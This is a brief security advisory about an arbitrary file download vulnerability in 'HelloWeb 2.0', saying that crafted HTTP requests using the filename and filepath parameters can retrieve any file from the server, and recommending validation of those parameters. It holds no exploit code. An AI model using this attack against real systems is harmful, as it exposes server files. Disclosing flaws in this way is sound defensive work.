HelloWeb 2.0 – Arbitrary File Download

An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The request should contain the filename and filepath parameters, which can be used to download any file from the server.

Mitigation:

The application should validate the filename and filepath parameters to ensure that only authorized files can be downloaded.
